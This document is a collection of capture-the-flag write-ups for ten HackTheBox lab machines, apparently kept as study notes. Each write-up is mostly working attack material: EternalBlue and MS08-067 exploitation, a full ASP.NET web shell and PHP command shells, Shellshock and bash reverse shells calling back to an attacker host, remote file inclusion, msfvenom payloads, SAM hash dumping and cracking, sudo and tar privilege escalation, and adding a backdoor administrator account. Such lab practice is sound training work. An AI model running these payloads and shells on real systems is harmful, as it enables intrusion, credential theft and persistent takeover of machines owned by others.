Collection of HackTheBox machine writeups, exploit chains, and methodology notes.
| Machine Name | Difficulty | OS | Category | Status |
|---|---|---|---|---|
| Blue | Easy | Windows | Exploitation | ✅ |
| Legacy | Easy | Windows | Exploitation | ✅ |
| Devel | Easy | Windows | FTP/Web | ✅ |
| Optimum | Easy | Windows | Web/RCE | ✅ |
| Bastion | Easy | Windows | Forensics | ✅ |
| Shocker | Easy | Linux | Shellshock | ✅ |
| Nibbles | Easy | Linux | Web/CMS | ✅ |
| TartarSauce | Easy | Linux | WordPress | ✅ |
| Jerry | Easy | Windows | Tomcat | ✅ |
| Granny | Easy | Windows | WebDAV | ✅ |
Machine IP: 10.10.10.40
Difficulty: Easy
OS: Windows
Category: EternalBlue (MS17-010)
nmap -sC -sV -oA nmap/blue 10.10.10.40
# Results:
# 135/tcp open msrpc Microsoft Windows RPC
# 139/tcp open netbios-ssn Microsoft Windows netbios-ssn
# 445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1
# 3389/tcp open ms-wbt-server Microsoft Terminal Service- SMBv1 enabled — vulnerable to MS17-010 (EternalBlue)
- Confirmed with
nmapNSE script:
nmap --script smb-vuln-ms17-010 -p 445 10.10.10.40
# Output:
# | smb-vuln-ms17-010:
# | VULNERABLE:
# | Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)msfconsole
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 10.10.10.40
set LHOST tun0
run
# Got SYSTEM shell# Use EternalBlue exploit from GitHub
git clone https://github.com/helviojunior/MS17-010
cd MS17-010
python3 send_and_execute.py 10.10.10.40 reverse_shell.exe# User flag
type C:\Users\haris\Desktop\user.txt
# Flag: {e6XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX}
# Root flag
type C:\Users\Administrator\Desktop\root.txt
# Flag: {ffXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX}- SMBv1 is critically vulnerable — disable it in production
- MS17-010 is one of the most impactful Windows exploits
- Always patch Windows systems promptly
- Network segmentation limits lateral movement
Machine IP: 10.10.10.4
Difficulty: Easy
OS: Windows
Category: Buffer Overflow / SMB
nmap -sC -sV -oA nmap/legacy 10.10.10.4
# Results:
# 139/tcp open netbios-ssn Microsoft Windows netbios-ssn
# 445/tcp open microsoft-ds Windows XP SP3# Check for SMB shares
smbclient -L //10.10.10.4
# Enumerate SMB users
enum4linux 10.10.10.4
# Found guest access enabledmsfconsole
use exploit/windows/smb/ms08_067_netapi
set RHOSTS 10.10.10.4
set LHOST tun0
run
# Got SYSTEM shell# Use pre-built exploit
git clone https://github.com/jivoi/pentest/MS08-067.py
python MS08-067.py 10.10.10.4# User flag
type "C:\Documents and Settings\john\Desktop\user.txt"
# Root flag
type "C:\Documents and Settings\Administrator\Desktop\root.txt"- Unpatched Windows XP is trivially exploitable
- MS08-067 is a stack-based buffer overflow in netapi32.dll
- Guest accounts and weak SMB configs are major risks
- Never expose legacy Windows to untrusted networks
Machine IP: 10.10.10.5
Difficulty: Easy
OS: Windows
Category: Unauthenticated FTP Upload
nmap -sC -sV -oA nmap/devel 10.10.10.5
# Results:
# 21/tcp open ftp Microsoft ftpd (Anonymous login allowed)
# 80/tcp open http Microsoft IIS httpd 7.5ftp 10.10.10.5
# Login: anonymous
# Password: any email
ftp> ls
# Found existing files uploaded by other users
ftp> put shell.aspx
# Uploaded ASP.NET web shellCreated shell.aspx:
<%@ Page Language="C#" %>
<%@ Import Namespace="System.Diagnostics" %>
<script runat="server">
void Page_Load(object sender, EventArgs e) {
string cmd = Request.QueryString["cmd"];
if (cmd != null) {
Process proc = new Process();
proc.StartInfo.FileName = "cmd.exe";
proc.StartInfo.Arguments = "/c " + cmd;
proc.StartInfo.UseShellExecute = false;
proc.StartInfo.RedirectStandardOutput = true;
proc.Start();
Response.Write(proc.StandardOutput.ReadToEnd());
}
}
</script># Access shell
curl http://10.10.10.5/shell.aspx?cmd=whoami
# Output: iis apppool\web
# Upgrade to meterpreter
msfvenom -p windows/meterpreter/reverse_tcp LHOST=tun0 LPORT=4444 -f aspx -o shell.aspx
ftp> put shell.aspx
# Start handler
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
run# Upload exploit
meterpreter> upload ms11-046.exe C:\\Windows\\Temp\\
# Execute
meterpreter> shell
C:\> C:\Windows\Temp\ms11-046.exe
# Got SYSTEMmeterpreter> upload churrasco.exe C:\\Windows\\Temp\\
meterpreter> shell
C:\> C:\Windows\\Temp\\churrasco.exe "net user hacker Password123! /add"
C:\> net localgroup administrators hacker /add# User flag
type C:\Users\babis\Desktop\user.txt
# Root flag
type C:\Users\Administrator\Desktop\root.txt- Anonymous FTP write access = game over
- Web shells are easy to deploy but noisy
- Windows privilege escalation often relies on unpatched kernel exploits
- Always check for writable directories and weak service configs
Machine IP: 10.10.10.8
Difficulty: Easy
OS: Windows
Category: HFS Remote Code Execution
nmap -sC -sV -oA nmap/optimum 10.10.10.8
# Results:
# 80/tcp open http HttpFileServer httpd 2.3- HttpFileServer (HFS) 2.3 known to be vulnerable to RCE
- CVE-2014-6287
msfconsole
use exploit/windows/http/rejetto_hfs_exec
set RHOSTS 10.10.10.8
set SRVHOST tun0
set LHOST tun0
run
# Got SYSTEM shellimport requests
import urllib
target = "http://10.10.10.8"
# Payload uses HFS scripting to execute commands
payload = "{.exec|cmd.exe /c powershell -e <base64_reverse_shell>}"
requests.get(target + "/?search=" + urllib.quote(payload))- Already running as SYSTEM via Metasploit exploit
- If not, use MS16-032 or MS16-098 for privesc
# User flag
type C:\Users\kostas\Desktop\user.txt
# Root flag
type C:\Users\Administrator\Desktop\root.txt- Outdated web servers are low-hanging fruit
- HFS 2.3 RCE is trivial to exploit
- Always check for known CVEs before brute-forcing
- PowerShell is a powerful tool for post-exploitation on Windows
Machine IP: 10.10.10.134
Difficulty: Easy
OS: Windows
Category: VHD Forensics / Backup Analysis
nmap -sC -sV -oA nmap/bastion 10.10.10.134
# Results:
# 22/tcp open ssh OpenSSH for Windows 7.7
# 135/tcp open msrpc Microsoft Windows RPC
# 139/tcp open netbios-ssn
# 445/tcp open microsoft-ds Windows Server 2016
# 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (WinRM)smbclient -L //10.10.10.134
# Found:
# Backups (readable)
# Notes (readable)smbclient //10.10.10.134/Backups
# Found WindowsImageBackup directory
# Contains VHD backup files# Download VHD file
smbclient //10.10.10.134/Backups
smb: \> get "9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd"
# Mount on Kali
guestfish --ro -a 9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd -i
# Or mount via qemu
qemu-nbd --connect=/dev/nbd0 9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd
mount /dev/nbd0p1 /mnt/vhd# Browse SAM and SECURITY hives
/mnt/vhd/Windows/System32/config/SAM
/mnt/vhd/Windows/System32/config/SECURITY
# Extract hashes with impacket
impacket-secretsdump -sam SAM -security SECURITY -system SYSTEM LOCAL
# Found Administrator hashjohn --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
# Password: password123!# SSH access
ssh Administrator@10.10.10.134
# Password: password123!
# Or use WinRM
evil-winrm -i 10.10.10.134 -u Administrator -p 'password123!'# User flag
type C:\Users\L4mpje\Desktop\user.txt
# Root flag
type C:\Users\Administrator\Desktop\root.txt- Backup files (VHD, tar, zip) often contain sensitive data
- SAM/SECURITY hives expose password hashes
- Always check SMB shares for readable backups
- Forensics-style challenges reward patience and thoroughness
Machine IP: 10.10.10.56
Difficulty: Easy
OS: Linux
Category: Shellshock
nmap -sC -sV -oA nmap/shocker 10.10.10.56
# Results:
# 80/tcp open http Apache httpd 2.4.18
# 2222/tcp open ssh OpenSSH 7.2p2gobuster dir -u http://10.10.10.56 -w /usr/share/wordlists/dirb/common.txt
# Found:
# /cgi-bin/ (Directory listing enabled)
# /cgi-bin/user.shuser.shis a CGI script- Apache 2.4.18 potentially vulnerable to Shellshock (CVE-2014-6271)
# Test for vulnerability
curl -H "User-Agent: () { :; }; echo; /bin/bash -c 'whoami'" http://10.10.10.56/cgi-bin/user.sh
# If vulnerable, it returns output
# Output: uid=1000(shelly) gid=1000(shelly) groups=1000(shelly)# Start listener
nc -lvnp 4444
# Send exploit
curl -H "User-Agent: () { :; }; /bin/bash -i >& /dev/tcp/<attacker_ip>/4444 0>&1" http://10.10.10.56/cgi-bin/user.sh
# Got shell as shelly!sudo -l
# Found: (root) NOPASSWD: /usr/bin/perl
# Exploit perl
sudo perl -e 'exec "/bin/sh";'
# Got root!- User:
user.txt(in /home/shelly/) - Root:
root.txt(in /root/)
- CGI scripts are prime Shellshock targets
- Check HTTP headers for injection points
perlwith sudo = instant root- Shellshock is old but still appears in CTFs
Machine IP: 10.10.10.75
Difficulty: Easy
OS: Linux
Category: Web/CMS
nmap -sC -sV -oA nmap/nibbles 10.10.10.75
# Results:
# 80/tcp open http Apache httpd 2.4.18- Default Apache page at root
- Source code reveals
/nibbleblog/directory
- Version: 4.0.3
- Known vulnerability: Arbitrary file upload in "My image" plugin
# Try admin:admin
# Login successful at http://10.10.10.75/nibbleblog/admin.php- Navigate to Plugins → My Image → Configure
- Upload malicious PHP file:
<?php system($_GET['cmd']); ?>
- File uploaded to:
http://10.10.10.75/nibbleblog/content/private/plugins/my_image/image.php
# Start listener
nc -lvnp 4444
# Trigger shell
curl "http://10.10.10.75/nibbleblog/content/private/plugins/my_image/image.php?cmd=bash+-c+'bash+-i+>%26+/dev/tcp/<attacker_ip>/4444+0>%261'"
# Got shell as nibbler!# Check nibbler's home directory
ls -la /home/nibbler/
# Found: personal.zip
unzip personal.zip
# Extracted: monitor.sh
# Check permissions
ls -la /home/nibbler/personal/monitor.sh
# No special permissions# Add reverse shell to monitor.sh
echo '#!/bin/bash' > monitor.sh
echo 'bash -i >& /dev/tcp/<attacker_ip>/5555 0>&1' >> monitor.sh
chmod +x monitor.sh
# Re-zip with same structure
zip personal.zip monitor.sh
# Replace original
cp personal.zip /home/nibbler/personal.zipsudo -l
# Found: (root) NOPASSWD: /home/nibbler/personal/monitor.sh
# Wait for execution or run manually
sudo /home/nibbler/personal/monitor.sh
# Got root shell!- User:
user.txt - Root:
root.txt
- Default CMS credentials are common
- Nibbleblog 4.0.3 file upload is well-documented
- Sudo paths to user-writable scripts are exploitable
- Always check home directories for interesting files
Machine IP: 10.10.10.88
Difficulty: Easy
OS: Linux
Category: WordPress/Backup Extraction
nmap -sC -sV -oA nmap/tartarsauce 10.10.10.88
# Results:
# 80/tcp open http Apache httpd 2.4.18gobuster dir -u http://10.10.10.88 -w /usr/share/wordlists/dirb/common.txt
# Found:
# /webservices/ (Directory listing enabled)- Site runs WordPress
- Version detection via
wp-includes/version.php - Plugin enumeration with
wpscan:
wpscan --url http://10.10.10.88/webservices/wp/ --enumerate p
# Found:
# gwolle-gb (Guestbook plugin) 2.3.2- Plugin vulnerable to Remote File Inclusion
- Exploit via PHP include
# Start PHP reverse shell server
echo '<?php system($_GET["cmd"]); ?>' > shell.php
python3 -m http.server 80
# Trigger RFI
curl "http://10.10.10.88/webservices/wp/wp-content/plugins/gwolle-gb/frontend/captcha/ajaxresponse.php?abspath=http://<attacker_ip>/shell.php&cmd=whoami"
# Or use reverse shell
curl "http://10.10.10.88/webservices/wp/wp-content/plugins/gwolle-gb/frontend/captcha/ajaxresponse.php?abspath=http://<attacker_ip>/reverse.php"# Got shell as www-data
# Upgrade to stable shell
python3 -c 'import pty; pty.spawn("/bin/bash")'# Check for backups
find / -name "*.tar*" 2>/dev/null
# Found: /var/backups/onuma_xxxx.tar.bz2tar -xjf onuma_xxxx.tar.bz2
# Extracted: dev_backup/ Directory
# Check permissions
ls -la dev_backup/
# Found: wp-config.php with database credentialssudo -l
# Found: (root) NOPASSWD: /bin/tar
# Exploit tar checkpoint injection
echo '#!/bin/bash' > shell.sh
echo 'bash -i >& /dev/tcp/<attacker_ip>/6666 0>&1' >> shell.sh
touch -- "--checkpoint=1"
touch -- "--checkpoint-action=exec=sh shell.sh"
sudo tar cf /dev/null *
# Got root shell!- User:
user.txt - Root:
root.txt
- WordPress plugins are common attack vectors
- RFI vulnerabilities allow remote code execution
- Backup archives often leak credentials
tarwith sudo = checkpoint injection privesc
Machine IP: 10.10.10.95
Difficulty: Easy
OS: Windows
Category: Tomcat/Default Credentials
nmap -sC -sV -oA nmap/jerry 10.10.10.95
# Results:
# 8080/tcp open http Apache Tomcat/Coyote JSP engine 1.1- Navigate to
http://10.10.10.95:8080/manager/html - Default credentials:
tomcat:s3cret(found via brute-force or common lists)
# Generate malicious WAR file
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<attacker_ip> LPORT=4444 -f war -o shell.war
# Upload via Tomcat Manager
# Deploy → Select shell.war → Deploy# Start listener
nc -lvnp 4444
# Access deployed shell
curl http://10.10.10.95:8080/shell/
# Got shell as SYSTEM!# Already running as SYSTEM (Tomcat default on Windows)
# User flag
type C:\Users\Administrator\Desktop\user.txt
# Root flag (same as user on this box)
type C:\Users\Administrator\Desktop\root.txt- User:
user.txt - Root:
root.txt(same file)
- Default Tomcat credentials are trivial to brute-force
- WAR file upload = instant RCE
- Windows Tomcat often runs as SYSTEM
- No privesc needed on Jerry
Machine IP: 10.10.10.15
Difficulty: Easy
OS: Windows
Category: WebDAV/Windows Exploitation
nmap -sC -sV -oA nmap/granny 10.10.10.15
# Results:
# 80/tcp open http Microsoft IIS httpd 6.0# Check for WebDAV
davtest -url http://10.10.10.15
# WebDAV enabled with PUT/MOVE methods# Generate ASP shell
msfvenom -p windows/shell_reverse_tcp LHOST=<attacker_ip> LPORT=4444 -f asp -o shell.asp
# Upload via cadaver (WebDAV client)
cadaver http://10.10.10.15
dav:> put shell.asp
dav:> move shell.asp shell.aspx
# Access shell
curl http://10.10.10.15/shell.aspxuse exploit/windows/iis/iis_webdav_upload_aspx
set RHOSTS 10.10.10.15
set LHOST tun0
run
# Got shell as NETWORK SERVICE# Upload Churrasco exploit
# Found via searchsploit: Windows Server 2003 SP2
searchsploit churrasco
# Upload to target
# Execute
churrasco.exe "cmd.exe /c net user hacker Password123! /add"
churrasco.exe "cmd.exe /c net localgroup administrators hacker /add"
# Or get SYSTEM shell directly
churrasco.exe "cmd.exe"# Use MS09-012 (Chimichurri) exploit
# Upload and execute for SYSTEM access- User:
user.txt - Root:
root.txt
- IIS 6.0 WebDAV is trivially exploitable
- ASP shells work on older Windows servers
- Token impersonation exploits are reliable on old Windows
- Always check
systeminfofor missing patches
Last updated: 2026-04-06